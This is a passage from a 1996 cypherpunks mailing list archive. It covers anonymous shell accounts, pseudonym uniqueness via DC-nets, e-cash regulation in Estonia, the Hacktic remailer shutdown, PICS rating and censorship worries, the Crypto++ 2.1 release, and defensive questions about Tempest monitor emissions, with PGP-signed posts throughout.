MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 17:39 1996-05-10 EDT, E. ALLEN SMITH wrote:
>Yes, for the cryptographic purposes. It doesn't make much difference
>on the juristictional end of things - I'd need to locate a UNIX account
>in another country for that. Hmm... possible.
>	-Allen

Anybody who want's an anonymous shell account in Sweden, send me MTB ecash
and I'll get an account opened for you with a local ISP. Sweden has the best
Internet access outside North America. A 34 Mbps line to the US, soon to be
upgraded to 155 Mbps!

Matts

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzEfDgAAAAEIAOSUUb2IOrKOOVhkoagTe4Feo14Ltmyo8ihpkmkUUE62Ydb5
La6Q6HRj6X51fFWIPp+1IM+GNTbb/OmZOo2vhseYbofJBZB+TwasX0HU5EyzJIGS
2R/T7DSzcv+XbLdwfLXBeAQomt3ETKIN9dCkUy9oMiHhvNbgLG6KLvzE5QP8O4Re
/QnIxoWX/k9EpJjR21K4EUncBahWzqL6oWKLKf4GyrA7NMQoaWazvfPIkGyhP8v2
qPIBbePcYD0COd8vHLvw45rv3hjRc1b/l4kcZ4ZMiLDfLkd3tHqbYrJA3grAQeiS
LZ+y/O2X04/zrLO5ieExfjyL6zDUFUWFZTKJRBEABRG0H01hdHRzIEthbGxpb25p
ZW1pIDxtYXR0c0BwaS5zZT6JARUDBRAxHw5YFUWFZTKJRBEBAQSpB/9rzmQ96pFD
6wYUMOsOBO+3SxZzk2mYA0AGcmpy9nd8fij70Vfvx2na/oslH2V/KEXlLXJz7EZm
WdVkDub+JMQsBODK50rD5KTZ6vmLzAXuTzJM9SKUsPBAJxul2f287SP2kI2T/LS9
iTkuWdZjPLKAZJ/ga4+M31m3eNiJeBTcris0ET51qMt+blzipu6y1LvhOj80IInh
bZLge+YBHAzVaK8NdbD3OWlnVat57ImPiBsfeJ0Y6v6YC3YepbyQZDGb1/Gi+do2
OIWr3OfYyVwzzcDclZ/tme7+2h2u1CHDBJNcOcOdk9fwX/4tdUIXnV60g0dM49MN
h54S0VAVF9K1
=O083
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMZRwuhVFhWUyiUQRAQFZvQgAyVhiQ+rDLsaR82GnhJL0MT+imIdJJYmw
MDrKFQ3ddMSFqqskIF+ZHwnVmNPek2b/f17gnamTWE5qxxHWszUA5AeA0q1Jz8dm
HeMp3j1rbLvBFdUoZImK+YhNCjUcregc3Ud0rBunYrRDIsrkdHbWuGjcQkIr3V56
9LFC9xyJ6WYrn8/DvcArSbYlU6btrq8oaE29AxcWyw3ehrV4+TMKBOEHjUkssnzW
Qptx/+daXOwB1qml86jDThL7VdvM6EiMr+DmyGKnZGsms2FsOhnBGlYq1fOS9XnA
ik2+yLmH59O+wDtXEsuOd4NR8Ufmg38AvRAbULdP9XA2jiBmH6VODg==
=ADJC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 12 May 1996 08:31:06 +0800
To: bryce@digicash.com
Subject: Re: need nym-differentiation, perpetual motion, and FTL travel please
In-Reply-To: <199605111821.UAA06757@digicash.com>
Message-ID: <199605111906.PAA07461@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



bryce@digicash.com writes:
> Unfortunately I can't think of a good way to have both
> pseudonymity and nym-differentiation.  I think that it is
> possible, however.  Can anyone suggest a mechanism?

Terminals which genetically sample their users?

Seriously, the problem, as stated, is thoroughly impossible to solve
in the real world. Anyone can pretend to be anyone in the
non-cyberspace world -- how can you stop them on the net?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 12 May 1996 09:08:34 +0800
To: bryce@digicash.com
Subject: Re: need nym-differentiation, perpetual motion, and FTL travel please
In-Reply-To: <199605111923.VAA07367@digicash.com>
Message-ID: <199605111942.PAA07516@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



bryce@digicash.com writes:
> Okay having said I couldn't think of a good way, I'll go
> ahead and suggest a way.
> 
> Let's assume that it is possible to stop people from
> pretending to be anyone in Real Life(tm).  (It is possible.)

How? Identity police taking genetic samples from every person on the
planet six times a day?

Even that can't prevent me from going to a corner pay phone and
calling someone and saying I am Ignatz Ratkin.

> Now let's collect N people and form a Dining-Cryptographers'
> net.  Once the Dining-Cryptographers' net is up-and-running
> let's put out a call for each of the N participants to
> announce a public key which will be their nym from now on.
> Assuming that you get N public keys, you can have _some_
> degree of assurance that there is a one-to-one mapping
> between pubkeys/nyms and humans on the DC-Net.

And how do you catch the person who tries to send out two keys?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 12 May 1996 09:32:44 +0800
To: cypherpunks@toad.com
Subject: Re: distinctive properties of ecash, netbill, cybercash and iKP
In-Reply-To: <+kMlx8m9LQfO085yn@netcom.com>
Message-ID: <sZ6RND139w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


abostick@netcom.com (Alan Bostick) writes:
> >
> > This is one question why the central bank in Estonia (I am not sure about
> > other countries) does not allow issuing e-cash here in Estonia. While the
> > banks issue e-cash to people, they get some real cash from people.  This
> > leads to actually doubleing the money in circulation, each monetary unit,
> > either dollar or kroon, can at the same time be used by owner of e-cash
> > and at the same time by the bank. The central banks are afraid that when
> > the amount of e-cash in circulation gets big, this could lead to
> > devalvation of money, especially a small country like Estonia is afraid of
> > such development.
>
> Good heavens!  Are checking accounts illegal in Estonia, then?  The exact
> same argument applies to them.

Well, checking accounts and travellers checks are all part of the M1
money supply. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 12 May 1996 12:14:35 +0800
To: bryce@digicash.com
Subject: Re: need nym-differentiation, perpetual motion, and FTL travel please
In-Reply-To: <199605111821.UAA06757@digicash.com>
Message-ID: <Pine.SOL.3.91.960511160921.18176B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


This is one of the features in the forthcoming release of Comparichino, 
the worlds first java compatible internet-secure biometric device. nyms 
are generated by xoring your key fingerprint with your index 
fingerprint. 

Simon 

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sun, 12 May 1996 01:24:23 +0800
To: cypherpunks@toad.com,       E$ mailing list <e$@thumper.vmeng.com>
Subject: Re: distinctive properties of ecash, netbill, cybercash and iKP
In-Reply-To: <161@fzl.win-uk.net>
Message-ID: <Pine.GSO.3.93.960511163200.17967B-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain



 Sat, 11 May 1996, Jon Moore wrote:

> Bert-Jan said:
> 
> >=B7 Monetary value: it must be backed by either cash (currency), bank
> >authorized credit, or a bank-certified cashier's check, so that it is
> >easily accepted by others.
> 
> The banks/cash-issuing corporations are likely to support anything
> that is secure enough, and looks like a runner, because any e-money
> scheme is profitable to them (they earn interest on the
> corresponding real cash while the e-money is in circulation). 

This is one question why the central bank in Estonia (I am not sure about
other countries) does not allow issuing e-cash here in Estonia. While the
banks issue e-cash to people, they get some real cash from people.  This
leads to actually doubleing the money in circulation, each monetary unit,
either dollar or kroon, can at the same time be used by owner of e-cash
and at the same time by the bank. The central banks are afraid that when
the amount of e-cash in circulation gets big, this could lead to
devalvation of money, especially a small country like Estonia is afraid of
such development.

Anonymity of monetary transactions is another thing that Bank of Estonia
has declared illegal.

Juri Kaljundi
jk@stallion.ee
AS Stallion





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 12 May 1996 03:22:33 +0800
To: cypherpunks@toad.com
Subject: Re: Hacktic remailer shutdown
Message-ID: <199605111518.RAA18105@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


-rich sez:

: > Is there any information available on why the Hacktic remailer was shut
: > down?

: Church of Scientology. Someone posted too many Secret Scriptures, it
: seems. The details, nobody has shared. Conspiracy theories, galore, but I
: have faith in their judgement and commitment to free speech and anonymity.
: I'm sure it was a tough decision.

: Btw, I don't believe it has shut down yet. Rather, the operators announced
: that due to "recent events," there would be a planned shutdown on May
: 20th. 

: I *would* like to know if the mail2news gateway is going down in addition
: to the remailer. I'm assuming that it is. 

utopia.hacktic.nl is currently MX'ed to basement.replay.com, and the
mail2news gateway has been installed there to. mail2news@utopia.hacktic.nl
will work as long as utopia is MX'ed so one better use the one installed 
directly by mailing your posts to mail2news@basement.replay.com.

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 12:34:22 +0800
To: reagle@mit.edu
Subject: Re: Publicity on PICS
Message-ID: <01I4L80J7EDS8Y5CGN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@mit.edu"  "Joseph M. Reagle Jr." 10-MAY-1996 02:18:58.44
>From:	IN%"EALLENSMITH@mbcl.rutgers.edu"  "E. ALLEN SMITH"

>        It is _very_ confusing to follow though.

>>CompuServe, Microsoft, Prodigy and Netscape Communications will soon give
>>their customers software enabling them to block access to material they
>>judge objectionable on the Internet's Worldwide Web.

>        Consider that Compuserve had a deal with SurfWatch, which was
>incorporated in it "Internet" in a box, with a lot of Spry goodies. Now
>Surfwatch has been purchased by Spyglass (a competitor or Spry). Also,
>Compuserve offers RSACi services through CyberPatrols RSACi compliance (got
>some weird derivitive and cross-liscencing works going on here!) and urges
>its users and 3rd party people to use RSACi...

	I don't suppose that someone at Netscape can give us more information
on this than is currently out there? All we've seen so far are the press
reports, which are often inaccurate.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 12:52:45 +0800
To: vznuri@netcom.com
Subject: Re: Publicity on PICS
Message-ID: <01I4L8TE6OIS8Y5CGR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 11-MAY-1996 00:25:38.47

>From:	IN%"EALLENSMITH@mbcl.rutgers.edu"  "E. ALLEN SMITH"

>>>The system depends for its ratings on voluntary compliance by Internet
>>>providers.

>ugggghghghghg. not my ideal use of PICS. I hope that people don't
>begin to believe that PICS is this system.

	Oh? Look at the second method listed for means of getting PICS ratings.
>From the ISP, essentially.

>>>But there is no way to use the system to seek out pornography or violence on
>>>the web, officials insisted.

>I don't know why that would be a problem.

	That they mentioned this is perhaps an indication that they aren't
exactly on the side of anyone except pro-censorship parents.

>>>"To content-providers, I would say, 'Rate your sites' To parents I would
>>>say, 'Set the levels for your children.' And to governments, I would say
>>>humbly, 'Think again before censoring the net,"' Stephen Balkam, executive
>>>director of the Recreational Software Advisory Council, told a news
>>>conference.
>>
>>	Note again the pressure for self-rating.

>"content-providers" != internet providers. that former is OK. the
>latter is a horrible nightmare. please, please, please, 

	I'd call both a problem, when you're using a system that is meant for
censorship purposes as opposed to finding-stuff purposes. If it's a system for
finding stuff, then the content provider should be involved; it will vary
whether the ISP should be involved (that can be left up to the individual ISP).

>>	Whatever became of market-ratings? Admittedly, they may mean that each
>>country will be encouraged to given an example system... but I still don't
>>like the idea of government involvement.

>the government becomes just another rating agency. I don't like it either.
>but as long as we emphasize, "the individual always has the ultimate
>decision", which fortunately this press release does,
>little can go awry, hopefully.

	They try to emphasize individual - or actually, parental - decision,
but they seem to have entirely forgotten about the use of this system by
governmental censors. It can be used for such either for preemptive censorship
(a Chinese firewall) or for spotting people to arrest when you start up
censorship. If the government gets involved in doing a rating system, then
it can better start doing things like mandating that particular material be
rated or you're up on "corrupting a minor". The recent CDA decision (thank you,
all plaintiffs, lawyers, judges, and God) does emphasize that mandatory rating
isn't constitutional... but A. the Supreme Court may not be as sensible (God
forbid) and B. other countries may have other ideas.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 11:09:21 +0800
To: vznuri@netcom.com
Subject: Re: Publicity on PICS
Message-ID: <01I4L8WIK8YI8Y5CGR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Whoops... I misread the press release from the ACLU. The judges haven't
made such a decision yet, unfortunately. Sorry.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 12 May 1996 11:56:28 +0800
To: bryce@digicash.com
Subject: Re: found nym-differentiation! Still need perpetual motion, FTL travel, cold fusion
In-Reply-To: <199605112023.WAA08121@digicash.com>
Message-ID: <199605112302.TAA07610@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



bryce@digicash.com writes:
> > How? Identity police taking genetic samples from every person on the
> > planet six times a day?
> 
> Sure: genetic samples and biometric ID in general, collected
> by identity police,

I doubt that will work even were it implemented. Every phone on the
planet and terminal would need to constantly do biometric analysis of
every user, and even then people could program their terminals to lie.

> > > Now let's collect N people and form a Dining-Cryptographers'
> > > net.  Once the Dining-Cryptographers' net is up-and-running
> > > let's put out a call for each of the N participants to
> > > announce a public key which will be their nym from now on.
> > > Assuming that you get N public keys, you can have _some_
> > > degree of assurance that there is a one-to-one mapping
> > > between pubkeys/nyms and humans on the DC-Net.
> > 
> > And how do you catch the person who tries to send out two keys?
> 
> Simple as pie, because of some of the properties of DC-Nets.
> If someone sends out the wrong number of pubkeys, then
> everyone will know, right?  So when that happens everyone
> just reveals their shared-secret data from the DC-Net
> session.

And if several people lie about their shared secrets?

Really, you aren't thinking nearly deviously enough.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 12:22:44 +0800
To: vznuri@netcom.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4L9W7VMMW8Y5CGR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 11-MAY-1996 03:38:35.85

>the idea with the rating system is that the rating signs the signature
>of the page, which is itself digitally hashed or something. in other
>words, the rating is on the "state" of a page at some time. the system
>would at least be able to detect a change in the state of a page,
>and inform the user that a rating may no longer be valid due to obsolescence.
>but you are correct that page changes are probably more problematic
>for market ratings than self-ratings.

	One wonders what their hashing method would be. If it's not very
cryptographically secure, one could (via selection of image file names,
comments, etcetera) cause it to be the same hash for a very different set of
images. (A Fun With Animals page from riding lesson photos to bestiality, for
instance.)

>2. will self-ratings be deliberately misused by people protesting the
>system? will it be a problem?

	And how are you defining "misuse"? If the system is not good, then
rating something differently than how the system says it should be is using it
properly, not improperly.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 12:35:12 +0800
To: vznuri@netcom.com
Subject: Re: Mandatory Voluntary Self-Ratings
Message-ID: <01I4LA5X6L8E8Y5CGR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 11-MAY-1996 04:32:46.80

>From: TCMay

>>If a system gets built into the WWW, as with proposals for PICS, it _will_
>>be used by those who want to control content. We should think twice before
>>helping in any way.

>I agree with your hesitation totally. I can easily see how the system
>would be twisted in unspeakable ways. but I can see a lot of very
>powerful positive uses too. as long as the best attempts are made to
>discourage the former and encourage the latter...  again, there is a
>question that the future might turn out to be more orwellian if no
>action is taken by internet designers whatsoever. I tend to believe
>that view.

	It currently appears that both groups doing PICS ratings are doing it
in a way that very much promotes unethical usage (by those wishing to control
content). This does not bode well for future uses of it.

>>(No, I'm not _against_ private ratings services...but this has little to do
>>with _me_, and I won't participate. More importantly, I won't have my
>>content have any kind of tag attached!

>notice that what you demand is wholly irrelevant. if you put something
>out in the public, in a world of free speech, anyone is free to
>rate your posting, or your opinions, etc.-- they just set a system
>that refers to the message-id of your posts or something.

>if what you are instead saying is that you will never insert your
>own tags into your content, well that is something you have control
>over. but you have absolutely no control over what people "attach"
>to your posts in a "virtual" sense.  anyone could set up the
>TCMay Rating Service and register ratings on everything you post in
>public.

	However, one can do things to disrupt the rating system. Until we've
got true AI, a web spider will be able to find and classify a newly-re-URLed
page a lot faster than the rating people are able to find it - especially if
one goes ahead and submits the web page to all the search engines every time
you reclassify it. A search engine could turn over all new pages to be rated -
but that would slow them down a lot, and other search engines would be used
more because they'd be more up to date.
	If you have some ratings services that you like - market-determined
ones, for instance - you can let them know the new URL also.

	The above is a bit harder for ratings of USENET posts and mailing list
messages, but there are so many of those that they'll be hard for a rating
service to keep up with.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 12 May 1996 12:20:35 +0800
To: stewarts@ix.netcom.com
Subject: Re: Penet-style web remailer?
Message-ID: <01I4LAJIIHO48Y5CGR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 11-MAY-1996 06:53:43.98

>Well, if you look at the remailer part of the web page, it's just
>one of many web pages that are a form interface to a remailer CGI program.
>Basically a friendly way to use a standard 1-way Cypherpunks remailer.

	Yes... but he does appear to keep track of the log file; he had up the
name of someone who allegedly misused it a few days ago. He states:
	"If this remailer is used for something illegal, it can be traced.
Also, if people use it to insult me, I will probably want to look in the logs
and find out who it is!"

>There is an amusing stealthed message at the bottom of the page,
>designed to attract high relevancy ratings from spiders.....

	Have people never heard of the "keyword" meta header?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 12 May 1996 13:59:55 +0800
To: cypherpunks@toad.com
Subject: Again: [hrdware] anti-Tempest video settings
Message-ID: <9605120112.AA02225@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


> It won't make any diifference to the potential attacker.
> His aim is to recover the text/shapes of what you are displaying. He
> is not generally concerned with the "niceness" of the display, but
> rather the contents.
But of course.  But what I want to know is: is there some 
combination of 
display colors that will be visible for the eye, but not for the 
Tempest equipment?  

> Also, many guns - red, blue, green actually do
> radiate on slightly different frequencies, allowing differentiation
> of signals - due to the slightly different physical geometry of the
> guns themselves.

That might answer it.  I suppose that if some "stealth" settings 
exists, they are highly hardware dependent.  

My question was not "would it work in all instances?" but rather
"had this tactic been implemented successfully in *some* instances?"


Or, to the contrary, is it reasonable to assume that modern Tempest equipment can
work around theses impediments almost all of the time, therefore 
making any attempts at this futile?

Regards

JFA


 PGP key ID# C58ADD0D  at: http://w3.citenet.net/users/jf_avon
 Key Fingerprint: 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 12 May 1996 07:58:19 +0800
To: cypherpunks@toad.com
Subject: need nym-differentiation, perpetual motion, and FTL travel please
Message-ID: <199605111821.UAA06757@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi.  I was thinking as I stood in the lunch line talking
with  Arnaud 
that what I like about <a href=
"http://www-ugrad.cs.colorado.edu/~wilcoxb/faq/DefnOfPseudonymity">
pseudonymity </a> is the part about being free from the
threat of violence.  I _don't_ like the part about being
able to have multiple identities nearly as much.  It would
really please me if I could figure out a way to reliably
determine that Alicenym is not the same human as Bobnym
without compromising the anonymity of the human(s) behind 
Alicenym and Bobnym.  (Since if their anonymity was thus
compromisable, they would be susceptible to the threat of
violence.)


Unfortunately I can't think of a good way to have both
pseudonymity and nym-differentiation.  I think that it is
possible, however.  Can anyone suggest a mechanism?


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZTal0jbHy8sKZitAQFn0gL+M5h/G1WlI6DMF2ZqQhllx+YDu23HGVdp
VJbSd0VuBvqKLtDeJ+css9uZ90nUDcsqT8Dws1xxdU+ejSe2Zh3HYLip3+L3LmWV
YDf446Pfswgkgs20HRyPzBs2B8c8JpNm
=xJYR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 12 May 1996 17:23:01 +0800
To: cypherpunks@toad.com
Subject: Re: Again: [hrdware] anti-Tempest video settings
Message-ID: <199605120337.UAA32475@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 5/11/96 +0000, Jean-Francois Avon wrote:

>Or, to the contrary, is it reasonable to assume that modern Tempest 
equipment can
>work around theses impediments almost all of the time, therefore 
>making any attempts at this futile?

It's probably worth investigating. Chances are good that as long as the 
total beam current remains as constant as possible, the signal will be much 
harder to interpret.  One way to investigate this comparatively easily is to 
measure the total power consumption of a monitor when the screen is filled 
with different colors at different saturations, etc.  Supply the AC to the 
monitor through a 1-ohm resistor, measure the AC voltage across the resistor 
to 1 mv accuracy or better, and you have a pretty good way to distinguish 
different beam currents.

 I'm waiting for cheap flat-panel displays for desktop computers to arrive, 
because they will probably be almost impossible to detect usably by Tempest 
systems.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 12 May 1996 08:40:51 +0800
To: perry@piermont.com
Subject: Re: need nym-differentiation, perpetual motion, and FTL travel please
In-Reply-To: <199605111906.PAA07461@jekyll.piermont.com>
Message-ID: <199605111923.VAA07367@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


 The entity calling itself "Perry Metzger" <perry@piermont.com>
 is alleged to have written:

> bryce@digicash.com writes:
> > Unfortunately I can't think of a good way to have both
> > pseudonymity and nym-differentiation.  I think that it is
> > possible, however.  Can anyone suggest a mechanism?
> 
> Terminals which genetically sample their users?


I hate hardware solutions.  I'm a software guy.  <img alt=":-)"
src="http://www-ugrad.cs.colorado.edu/~wilcoxb/smiley.1.gif">


> Seriously, the problem, as stated, is thoroughly impossible to solve
> in the real world. Anyone can pretend to be anyone in the
> non-cyberspace world -- how can you stop them on the net?


Okay having said I couldn't think of a good way, I'll go
ahead and suggest a way.


Let's assume that it is possible to stop people from
pretending to be anyone in Real Life(tm).  (It is possible.)
Now let's collect N people and form a Dining-Cryptographers'
net.  Once the Dining-Cryptographers' net is up-and-running
let's put out a call for each of the N participants to
announce a public key which will be their nym from now on.
Assuming that you get N public keys, you can have _some_
degree of assurance that there is a one-to-one mapping
between pubkeys/nyms and humans on the DC-Net.


Voila.


It's weak and complicated, so I wouldn't call it a "good 
way", but it _is_ a way to have both pseudonymity and
nym-differentiation.



Now that I've done this part, would someone else handle the
perpetual motion, FTL travel, cold fusion and so forth?
Thanks.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZTpGUjbHy8sKZitAQHK5QMAyYqR6Nv8j2HOMdq2JbTj1ZOiYhN2nbP9
WIwI92NyKVuv+i/PwGk8kkCsaGpq2n89/9JV2uKxvCN12m5on+rWwbDZeWUaHtgg
t7UXyGCV7bF8gauFvT1z2JMLmBzumZ4Q
=fnkf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 12 May 1996 17:23:58 +0800
To: Cypherpunks <coderpunks@toad.com
Subject: Crypto++ 2.1
Message-ID: <Pine.SUN.3.93.960511214048.23870A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Crypto++ 2.1 has just been released.  You can find download instructions
on the Crypto++ home page at http://www.eskimo.com/~weidai/cryptlib.html.

Crypto++ is a free C++ class library of cryptographic primitives.  Changes
made in version 2.1 include:

    - added Tiger, HMAC, GOST, RIPE-MD160, LUCELG, LUCDIF, XOR-MAC,
      OAEP, PSSR, SHARK
    - added precomputation to DH, ElGamal, DSA, and elliptic curve
      algorithms
    - optimizations in elliptic curves over GF(p)
    - changed Rabin to use OAEP and PSSR
    - changed many classes to allow copy constructors to work correctly
    - improved exception generation and handling

This is likely to be the last major revision of Crypto++.  Future
versions will probably only be released for bug fixes and compliance to
new standards.

Wei Dai

P.S.  A new set of benchmarks done using Crypto++ 2.1 is available at
http://www.eskimo.com/~weidai/benchmarks.txt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 12 May 1996 11:02:48 +0800
To: perry@piermont.com
Subject: found nym-differentiation!  Still need perpetual motion, FTL travel, cold fusion
In-Reply-To: <199605111942.PAA07516@jekyll.piermont.com>
Message-ID: <199605112023.WAA08121@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

 The entity calling itself "Perry Metzger"
 <perry@piermont.com> is alleged to have written:

> bryce@digicash.com writes:
> > Okay having said I couldn't think of a good way, I'll go
> > ahead and suggest a way.
> > 
> > Let's assume that it is possible to stop people from
> > pretending to be anyone in Real Life(tm).  (It is possible.)
> 
> How? Identity police taking genetic samples from every person on the
> planet six times a day?


Sure: genetic samples and biometric ID in general, collected
by identity police, by "IsAPerson" credential-distribution
organizations, and by your friends and family who hang out
with you all the time.


This prevents, for example, me from pretending to be Arnaud
Sahuguet when I'm talking to Berry Schoenmakers, since
Berry has gathered a lot of biometric information about
Arnaud and about me, such as how we look, sound and (?)
smell.


That kind of impersonation-prevention within a given set of
people is all I need to bootstrap my cool nyms-without-
doublenyms system described below.


(As an aside Berry can also differentiate Arnaud from me by
non-biometric information like the fact that Arnaud speaks
better French than I do.  On the net, however, it is easier
to pretend to speak French.)


> > Now let's collect N people and form a Dining-Cryptographers'
> > net.  Once the Dining-Cryptographers' net is up-and-running
> > let's put out a call for each of the N participants to
> > announce a public key which will be their nym from now on.
> > Assuming that you get N public keys, you can have _some_
> > degree of assurance that there is a one-to-one mapping
> > between pubkeys/nyms and humans on the DC-Net.
> 
> And how do you catch the person who tries to send out two keys?


Simple as pie, because of some of the properties of DC-Nets.
If someone sends out the wrong number of pubkeys, then
everyone will know, right?  So when that happens everyone
just reveals their shared-secret data from the DC-Net
session.  This makes everything that happened during that
session public.  The disruptor is kicked out of the nym club
and we back up a step and generate new pubkeys for
ourselves.


I'm getting rather interested in DC-Nets.  I don't suppose
anyone has gone ahead and invented a protocol for DC-Net
conversations?  It is a _really_ interesting problem,
because of the strange requirements of DC-Nets (such as
having denial-of-service prevention in the networking
layer, and the fact that it is shared-media even up at
the network layer) and because of their efficiency 
(/scaleability) problems.


Regards,

Bryce




- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZT2+EjbHy8sKZitAQHOtQL8CFAwvqo3H8+jKGdjeqi7tgjMUyWaYBoA
rBzj4vF9VisC2a7Q/bM4iwQD8mahz1EDidhcncWqTxAWXv+vq/Wf3Yhdy7Kb+168
4AuNLpFHLQRhu+0ijuWB77oiKb7jHHk2
=q/v1
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZT3J0jbHy8sKZitAQGrDgL9H1Z8QGNlPB6/thmGxSLu/Tna86aG1/WT
/tuGUK4vGAqMAR7M2freIgsqC3iQFO4nHqXzPyT46OJZlpJAUS4zzaE9gvgX7V/T
fn9eo75v9HfPRo6eY9VTh/gQP1PdW3gK
=zEyz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 12 May 1996 16:38:31 +0800
To: cypherpunks@toad.com
Subject: [hrdware] Is Tempest detecting only video?
Message-ID: <9605120409.AA09887@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 11 May 96 at 20:35, jim bell wrote:

>  I'm waiting for cheap flat-panel displays for desktop computers
> to arrive, because they will probably be almost impossible to
> detect usably by Tempest systems.

Does Tempest detects only the emission from the electron gun in the 
monitor or can it get a usable "lock" on some other signals generated 
within a computer?

As an example, can it grab the keystrokes?  If the answer is yes, can 
it do it:

a) rarely
b) occasionally
c) most of the time
d) almost all of the time
e) never

Could somebody knowledgeable in Tempest can rate the various 
emissions from a computer?

(such as: keyboard, COM port, modem, lpt, video signal(from the 
